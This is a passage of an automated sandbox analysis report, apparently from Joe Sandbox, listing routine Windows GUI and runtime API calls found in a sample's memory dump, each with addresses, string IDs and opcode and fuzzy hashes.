                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 83e2dca0bbc49365303d7204a3b80276d94be32524e903585c87723e8b9bf3c0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EE118F31901229ABDB11AF65AC0CAAF7BBCEF86710F114125F811E7290DB74DA258BA5
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 001347CD
                                                                                                                                                                                                                                                                  • Part of subcall function 00124852: GetDlgCtrlID.USER32(?), ref: 0012485D
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000111,?,?), ref: 001347F6
                                                                                                                                                                                                                                                                • SetCapture.USER32(?,?,?,?,0013B165,?,?,?), ref: 0013481E
                                                                                                                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?,0013B165,?,?,?), ref: 00134835
                                                                                                                                                                                                                                                                • UpdateWindow.USER32(?), ref: 0013483E
                                                                                                                                                                                                                                                                • SetTimer.USER32(?,0000EC0D,?,00000000), ref: 00134858
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CaptureCtrlInvalidateMessageParentRectSendTimerUpdateWindow
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 171814724-0
                                                                                                                                                                                                                                                                • Opcode ID: e09d43b51faff08d9deda4f0158a9aa8d89849fcc259c480358bd1f77b9b63a7
                                                                                                                                                                                                                                                                • Instruction ID: 30b968cf2f4bb15c816f046ddfe350b9a3ee42e7c4d299966cecdd50eca3fdda
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e09d43b51faff08d9deda4f0158a9aa8d89849fcc259c480358bd1f77b9b63a7
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F4115471710666FFD7082FB0DC88A66BB6AFF59301F10423AF55981530CB70A821DBD0
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: H_prolog3
                                                                                                                                                                                                                                                                • String ID: 0$ 0
                                                                                                                                                                                                                                                                • API String ID: 431132790-416354617
                                                                                                                                                                                                                                                                • Opcode ID: 5e074b9ea46bae21a268f2abd4a71948e4a39912a89d40767340d0841aaaf3c5
                                                                                                                                                                                                                                                                • Instruction ID: 7e5d7992a37c4d24df5b314197e2d3dea1f4a2d8ce42b7c55fe839a44ef1ee86
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5e074b9ea46bae21a268f2abd4a71948e4a39912a89d40767340d0841aaaf3c5
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4E919F31A0021A9FCF08EFA8DD99AAE7BB5FF94300F508129F459EB291DB35D910DB51
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 0015259D
                                                                                                                                                                                                                                                                • LoadImageW.USER32(?,00000000,00000000,00000000,00000000,00002000), ref: 00152740
                                                                                                                                                                                                                                                                • GetObjectW.GDI32(00000000,00000018,?), ref: 00152752
                                                                                                                                                                                                                                                                  • Part of subcall function 001527DF: GetObjectW.GDI32(?,00000054,?), ref: 001527F9
                                                                                                                                                                                                                                                                  • Part of subcall function 0014EBAD: __EH_prolog3_GS.LIBCMT ref: 0014EBB7
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 001527AA
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Object$DeleteH_prolog3H_prolog3_ImageLoad
                                                                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                                                                • API String ID: 3496229131-1727780284
                                                                                                                                                                                                                                                                • Opcode ID: 5c891a9e5e6bc412d8b141d5df48f1800d8e0d9e6cf75d2a9d82a873f0526b53
                                                                                                                                                                                                                                                                • Instruction ID: 1c8cfd161a893d2dbe05c014b734c8b4ea5753f261bab00b667798c585408b67
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5c891a9e5e6bc412d8b141d5df48f1800d8e0d9e6cf75d2a9d82a873f0526b53
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BB718B72901215CFCF19EF64C8847EE7BB1AF1A311F1441AAEC256F286CB359949CBA4
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetMenuCheckMarkDimensions.USER32 ref: 0011D7E5
                                                                                                                                                                                                                                                                • LoadBitmapW.USER32(00000000,00007FE3), ref: 0011D8E9
                                                                                                                                                                                                                                                                • __EH_prolog3_catch.LIBCMT ref: 0011D90F
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: BitmapCheckDimensionsH_prolog3_catchLoadMarkMenu
                                                                                                                                                                                                                                                                • String ID: X%$l%
                                                                                                                                                                                                                                                                • API String ID: 1577477441-3665333997
                                                                                                                                                                                                                                                                • Opcode ID: 899825b5ec4623dcecc45bdffd9f02a0dd1992e5b41abde2357a5090791d207c
                                                                                                                                                                                                                                                                • Instruction ID: 8a2d37cbef5c870e80aadc0a4c1f6bb68e1b1eed3e36ed6d103b5e206d57ae23
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 899825b5ec4623dcecc45bdffd9f02a0dd1992e5b41abde2357a5090791d207c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B041E575A003198FDB289F28EC85BADB7B4FF54304F5040BEE549EB241CB719A858F50
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 0012D7A6
                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0012D7DF
                                                                                                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 0012D7EC
                                                                                                                                                                                                                                                                  • Part of subcall function 00125255: __EH_prolog3.LIBCMT ref: 0012525C
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: H_prolog3$Exception@8Throw
                                                                                                                                                                                                                                                                • String ID: d/($d/(
                                                                                                                                                                                                                                                                • API String ID: 2489616738-2734272428
                                                                                                                                                                                                                                                                • Opcode ID: f6ecec2f164f45c4d49ec6257ea4130eb7687496962dc6c5b761888bcff7f598
                                                                                                                                                                                                                                                                • Instruction ID: 4a422219d4029930b9ecd9ce84eb92de1755a6197e6b893346b228b9e6391c15
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f6ecec2f164f45c4d49ec6257ea4130eb7687496962dc6c5b761888bcff7f598
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BC319C71911216ABDF19EFB4DC52BEEB775AF14314F148A28F422AB1D1CB30DAA4CB50
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00118C1C: __EH_prolog3.LIBCMT ref: 00118C23
                                                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 0011E2D3
                                                                                                                                                                                                                                                                • SetWindowsHookExW.USER32(00000005,00122E8F,00000000,00000000), ref: 0011E2E3
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,000D2198), ref: 0011E346
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,00118752), ref: 0011E356
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AddressCurrentFreeH_prolog3HookLibraryProcThreadWindows
                                                                                                                                                                                                                                                                • String ID: ${(
                                                                                                                                                                                                                                                                • API String ID: 3379832378-964378601
                                                                                                                                                                                                                                                                • Opcode ID: 1a4d16aa40fe42eabedf01d2ebe3f768fe9a00f7cead14944665e0d1e3dd1613
                                                                                                                                                                                                                                                                • Instruction ID: af6c7fa2e5becd4863303e46d6fe04bfa34bcc27b242febe02c585da3407b29e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1a4d16aa40fe42eabedf01d2ebe3f768fe9a00f7cead14944665e0d1e3dd1613
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5E21F635601716ABC7283BE19C06BDB7BD8EF50B21F108439FE1696590DF70D8D08AB2
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetStockObject.GDI32(00000011), ref: 00130DB0
                                                                                                                                                                                                                                                                • GetStockObject.GDI32(0000000D), ref: 00130DBC
                                                                                                                                                                                                                                                                • GetObjectW.GDI32(00000000,0000005C,?,?,?,00000000), ref: 00130DCD
                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(?,00000048,00000000), ref: 00130DFF
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Object$Stock
                                                                                                                                                                                                                                                                • String ID: hF
                                                                                                                                                                                                                                                                • API String ID: 1996491644-1628952500
                                                                                                                                                                                                                                                                • Opcode ID: 071aed78198d57394066256a1838762bb92eb58a5cdcf062c7bade491d059d6a
                                                                                                                                                                                                                                                                • Instruction ID: cf0efa7bad1dbca515d7633f369bfb34047a077c77675ac38e2e63f42e79edcb
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 071aed78198d57394066256a1838762bb92eb58a5cdcf062c7bade491d059d6a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C2114F71740318ABDB15AB95EC5DBBE7BA9EB99701F100019FA099B280DFB09C04C661
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RtlEnterCriticalSection.NTDLL(00287CD8), ref: 0011A876
                                                                                                                                                                                                                                                                • RtlInitializeCriticalSection.NTDLL(00000000), ref: 0011A88C
                                                                                                                                                                                                                                                                • RtlLeaveCriticalSection.NTDLL(00287CD8), ref: 0011A89A
                                                                                                                                                                                                                                                                • RtlEnterCriticalSection.NTDLL(00000000), ref: 0011A8A7
                                                                                                                                                                                                                                                                  • Part of subcall function 0011A821: RtlInitializeCriticalSection.NTDLL(00287CD8), ref: 0011A839
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CriticalSection$EnterInitialize$Leave
                                                                                                                                                                                                                                                                • String ID: @{(
                                                                                                                                                                                                                                                                • API String ID: 713024617-1990548501
                                                                                                                                                                                                                                                                • Opcode ID: bd3d32ff233a648b54b22454596c0cebad6b9a433d8e80311e2dc2f85b5ed049
                                                                                                                                                                                                                                                                • Instruction ID: 56714ada5b42bd1b48f2c40dd404a3eadd462a72b4a607ae0aea8d414db4b572
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bd3d32ff233a648b54b22454596c0cebad6b9a433d8e80311e2dc2f85b5ed049
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D2F0967A9022149BCA042B95FC8D7957E6CEFE6322FA51072F902C2152CB70D4C38BA6
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • RtlEnterCriticalSection.NTDLL(?), ref: 00118CCA
                                                                                                                                                                                                                                                                • TlsGetValue.KERNEL32(z(,?,?,00000000,?,00118C7A,?,00000004,001192CB,00118752,001192F4,0011B475,00119580,?,001196B4), ref: 00118CDE
                                                                                                                                                                                                                                                                • RtlLeaveCriticalSection.NTDLL(?), ref: 00118CF8
                                                                                                                                                                                                                                                                • RtlLeaveCriticalSection.NTDLL(?), ref: 00118D03
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CriticalSection$Leave$EnterValue
                                                                                                                                                                                                                                                                • String ID: z(
                                                                                                                                                                                                                                                                • API String ID: 3969253408-72658202
                                                                                                                                                                                                                                                                • Opcode ID: dc25591e48d7cd9410dc6f2a2b3860f1dcf07d86dad8fb78ba73968f22543c6d
                                                                                                                                                                                                                                                                • Instruction ID: 3987d173b3193c0e65bc3965d8285595ea6470a88f593602e692fce85da66bc9
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dc25591e48d7cd9410dc6f2a2b3860f1dcf07d86dad8fb78ba73968f22543c6d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5AF0BB326012109B8F1A5F95F889AAAB7A4FFE5750315C0B8E801AB151CF60FC43C791
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00259F23,?,?,00259EEB,?,?,?), ref: 00259F86
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00259F99
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00259F23,?,?,00259EEB,?,?,?), ref: 00259FBC
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                • Opcode ID: f5af4fbec21dbd366cde8df01f77a71d4a0ead265fff18cce0f3bbe17efda9bd
                                                                                                                                                                                                                                                                • Instruction ID: 1b6cde8753685cfef973d88b3d9a97061256132964dac63a2636e865c240e88e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f5af4fbec21dbd366cde8df01f77a71d4a0ead265fff18cce0f3bbe17efda9bd
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 81F0823061121AFBCB11AF61ED0DB9EBB65EB44756F114050FE00E2560CFB0CF51DA95
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 0023CACE
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000187,?,00000000), ref: 0023CB28
                                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 0023CB3D
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000111,?,?), ref: 0023CB6B
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000185,00000001,?), ref: 0023CB80
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$Parent
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1020955656-0
                                                                                                                                                                                                                                                                • Opcode ID: 4f4c459b56960438f05e1c9a9bca133b520681f15f656d65b94ccf86c3fffa1b
                                                                                                                                                                                                                                                                • Instruction ID: 687e6f2a071123eecb069494e985eec085a2b8ded6c728e62b2a62e7abf7694b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4f4c459b56960438f05e1c9a9bca133b520681f15f656d65b94ccf86c3fffa1b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6361E7B1610215ABDB14DF69DC86A6AB7A9FF84350F248169FD09EF241DB70DD20CBA0
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 001528A9
                                                                                                                                                                                                                                                                • RtlEnterCriticalSection.NTDLL(0028A14C), ref: 001528CE
                                                                                                                                                                                                                                                                • SelectObject.GDI32(?,00000018), ref: 00152995
                                                                                                                                                                                                                                                                • RtlLeaveCriticalSection.NTDLL(0028A14C), ref: 001529B6
                                                                                                                                                                                                                                                                • SelectObject.GDI32(00000000), ref: 001529E8
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CriticalObjectSectionSelect$EnterH_prolog3Leave
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3084423813-0
                                                                                                                                                                                                                                                                • Opcode ID: 65bc4c8860d0deb4b31afe54700075b2892a161157914ac9149f930ab7dacc7d
                                                                                                                                                                                                                                                                • Instruction ID: 49d6b987e47df9f3d4f9c6e6bb8fa45326dfc1a30df9b1b8a79f504733d510d1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 65bc4c8860d0deb4b31afe54700075b2892a161157914ac9149f930ab7dacc7d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E761AF32600B11CFDB35DF65D885A66B7E4BF66306F14842DECA68B661EB70E848CB11
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetClientRect.USER32(00000000,00148277), ref: 0017E823
                                                                                                                                                                                                                                                                  • Part of subcall function 00127E5B: ClientToScreen.USER32(?,?), ref: 00127E6A
                                                                                                                                                                                                                                                                  • Part of subcall function 00127E5B: ClientToScreen.USER32(?,?), ref: 00127E77
                                                                                                                                                                                                                                                                • PtInRect.USER32(00148277,?,?), ref: 0017E83D
                                                                                                                                                                                                                                                                • PtInRect.USER32(?,?,?), ref: 0017E8B6
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ClientRect$Screen
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3187875807-0
                                                                                                                                                                                                                                                                • Opcode ID: 4103302b4e5013ccdd44b6e769c41aed1df5c8ee9bf732b5d4fe45b367d39917
                                                                                                                                                                                                                                                                • Instruction ID: 4d200067367d6185a128902ffba92f365a75fd59e2b8f03546233df60eeca87f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4103302b4e5013ccdd44b6e769c41aed1df5c8ee9bf732b5d4fe45b367d39917
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 01414272A0410AEFCF14DFA4D9449AEB7F9EF0D304F1444A9E909FB244D731AA41DB61
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetWindowTextW.USER32(?,?,00000100), ref: 00126734
                                                                                                                                                                                                                                                                • lstrcmpW.KERNEL32(?,0011D623,?,00000000), ref: 00126746
                                                                                                                                                                                                                                                                • SetWindowTextW.USER32(?,0011D623), ref: 00126752
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,000D2EBC), ref: 001267B0
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 001267FB
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: TextWindow$AddressFreeLibraryProclstrcmp
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3860112898-0
                                                                                                                                                                                                                                                                • Opcode ID: 06a71e2b787002e0f061e4972880f9189491570ea2a518e243aa201a15cc1e45
                                                                                                                                                                                                                                                                • Instruction ID: 346392dce006c445a8a95b8b79b86de5eff30e18538958c257b4842855fb12b1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 06a71e2b787002e0f061e4972880f9189491570ea2a518e243aa201a15cc1e45
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6B31D675A00219ABCB10EFA4FC85BAEB7B8EF95710F110069FA05D7341EB749D148BA1
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000407,00000000,?), ref: 00134E2B
                                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 00134E4F
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000111,?), ref: 00134E7C
                                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 00134E9B
                                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 00134F0F
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Parent$MessageSend
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2251359880-0
                                                                                                                                                                                                                                                                • Opcode ID: 47447330b698927734f8172b356c09d0e590c0cbb65b59ec9eaf9a0775e549d3
                                                                                                                                                                                                                                                                • Instruction ID: be2d54a45fe7580f17f2ec79c0d85c829f0e0ba84bc9b5aa23869bc7fa2984d4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 47447330b698927734f8172b356c09d0e590c0cbb65b59ec9eaf9a0775e549d3
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C231E331601215FFDF296B64DC48A7ABA68FF09711F044236F688D7461D7B8ECA0CBA0
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(000D20E8), ref: 001212D4
                                                                                                                                                                                                                                                                • __Init_thread_footer.LIBCMT ref: 001212E4
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(000D212C), ref: 00121318
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(000D2140), ref: 0012132E
                                                                                                                                                                                                                                                                • __Init_thread_footer.LIBCMT ref: 0012133A
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AddressInit_thread_footerProc$HandleModule
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2862038163-0
                                                                                                                                                                                                                                                                • Opcode ID: e98bb378bd8b28bcf2b700896a7c43504c11b52d4eaef5ef1b89349696c92b1d
                                                                                                                                                                                                                                                                • Instruction ID: 5642bab4ba5ff652445a9f8c5e13fce710c438ffcf64427c6f87f728cb331f48
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e98bb378bd8b28bcf2b700896a7c43504c11b52d4eaef5ef1b89349696c92b1d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DA31D879522221EBDB18EF68FC09AB9B765EB65720F29412AF501C76E4CF7068D0CF50
                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • IsWindow.USER32(00000000), ref: 0017730D
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000439,00000000,?), ref: 00177352
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000410,00000000,?), ref: 00177398
                                                                                                                                                                                                                                                                • ScreenToClient.USER32(00000000,?), ref: 001773C0
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000407,00000000,?), ref: 001773E8
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.551374961.00000000000D6000.00000020.00020000.sdmp, Offset: 000D6000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_d6000_sample4.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$ClientScreenWindow
                                                                                                                                                                                                                                                                • String ID:
